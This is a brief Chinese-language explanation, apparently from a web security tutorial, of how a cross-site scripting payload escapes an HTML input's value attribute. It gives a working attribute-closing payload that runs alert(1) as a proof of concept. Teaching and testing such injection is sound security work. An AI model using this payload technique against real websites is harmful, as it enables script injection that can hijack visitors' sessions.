如下發現js代碼插入到HTML中,但是無法執行,因為xss代碼出現在value中,被當作值來處理。
<input type="text" name="content" value="<script>alert(1)</script>" />
可以用如下方法讓HTML閉合
插入xss代碼為:" "/><script>alert(1)</script> "
<input type="text" name="content" value=" "/><script>alert(1)</script>" />